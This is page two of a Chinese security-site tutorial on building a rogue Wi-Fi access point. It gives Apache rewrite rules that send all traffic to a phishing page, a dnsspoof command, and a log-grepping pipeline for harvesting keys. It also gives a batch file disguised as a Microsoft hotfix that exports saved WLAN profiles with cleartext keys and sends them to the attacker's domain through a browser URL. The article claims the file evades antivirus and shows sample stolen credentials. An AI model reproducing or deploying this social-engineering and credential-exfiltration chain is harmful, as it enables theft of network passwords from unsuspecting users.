欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

无线安全课堂:手把手教会你搭建伪AP接入点

来源:本站整理 作者:佚名 时间:2017-08-03 TAG: 我要投稿
Options Indexes FollowSymLinks MultiViews
AllowOverride None
Order allow,deny
allow from all
--> add    RewriteEngine On
--> add       RewriteCond  %{REQUEST_URI}  !^/Fixit
--> add          RewriteRule ^.*$ /Fixit/
利用社会工程学技巧,同时设计网页引诱用户下载并执行payload。你需要将index.html文件放置到/var/www/html/Fixit/
启用mod_rewrite模块:
a2enmod rewrite
您必须重新启动apache2才能更新配置
service apache2 restart
Step 4:DNS欺骗
运行dnsspoof即可将所有HTTP(非HTTPS)请求重定向到我们的apache服务器,并且用户不会访问到互联网(IP转发为禁用状态)如果你攻击接入互联网的域,则该方法没有什么用处。这种情况就使用dnsmasq结合上面介绍的fakehosts.conf文件进行攻击。由于我们没有给用户提供互联网访问权限,所以直接运行:
dnsspoof -i wlan0       #wlan0 is interface hostapd is operating on
Step 5:获取密钥
运行Apache的access.log,并通过grep转发管道内容该正则表达式将解析我们传入的20字符的SSID/name,AP身份验证类型以及8~64字符WLAN密钥
tail -F /var/log/apache2/access.log | grep -E -o ".?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?"\|"..?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?"\|".?.?.?.?.?.?.?.?.?.?.?" | uniq
命令分解:
tail -F :    Tail -F参数将读取access.log文件末尾10行内容,等待并显示新增内容.
输出将实时传递给grep
grep:
-E :       用于解析PATTERN这个正则表达式扩展
-o :       仅打印匹配行中的匹配内容(非空), 输出单独成行
uniq:      移除重复条目
Step 6:封装
在/var/www/下建立一个名为Fixit的目录,注意区分大小写
mkdir /var/www/Fixit
Step 7:秘密武器
Apache中的index.html下载链接指向我的自定义文件。比如Microsoft-Windows-Hotfix.bat,这个批处理文件并不复杂,已过杀毒软件且不受防火墙影响。只要浏览器能正常工作,那么该文件就能工作
@echo off
SET mypath=%~dp0
netsh wlan export profile > nul
netsh wlan export profile key=clear > nul
setlocal enableextensions enabledelayedexpansion
set /a counter=0
set filecontent=
for %%b in (*.xml) do (
set /a counter=!counter! + 1
:: echo %%b
for /f "delims=" %%a in ('type "%mypath%%%b"') do (
set filecontent=!filecontent!%%a
)
)
echo !filecontent! > %filename%data.txt
@rem The next line is platform specific. Sometimes in a diff folder
"c:Program FilesInternet Exploreriexplore.exe" microsoftfix.com/"!filecontent!"
用户一旦执行该恶意Wi-Fi密钥嗅探器,它将提取并解码WLAN配置文件。在用户设备中打开浏览器,然后指向microsoftfix.com(我们搭建的服务器)且URL中包含了之前收获的密钥,内容将存储在我们的apache日志(/var/logs/apache2/access.log)我选择使用URL,因为这将数据传输到服务器上最安全的方法。在大多数机器上的防火墙可能阻止FTP传输,但是由用户自主点击下载的文件则不会触发杀毒软件保护。你所需要做的便是过滤验证类型以及重要的密钥(Wi-Fi密钥)数据,在步骤5我们就使用tail以及grep命令进行过滤了。
rootsh3ll
WPA2PSK
iamrootsh3ll
结语
本文所述其实只是一个大略,更多的细节以及技巧都在作者自己所著的电子书籍中。译者在这里并不推荐各位读者购买:
其一该书没有中译版本,如果自己就有阅读英文文献的能力,多逛逛相关社区几乎就能了解其中的许多奇淫巧计。其二外国的月亮不一定就比国内的更圆,技术没国界这话真的没错,国内玩得有时候比国外大兄弟还要更6些。
 

上一页  [1] [2] 

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载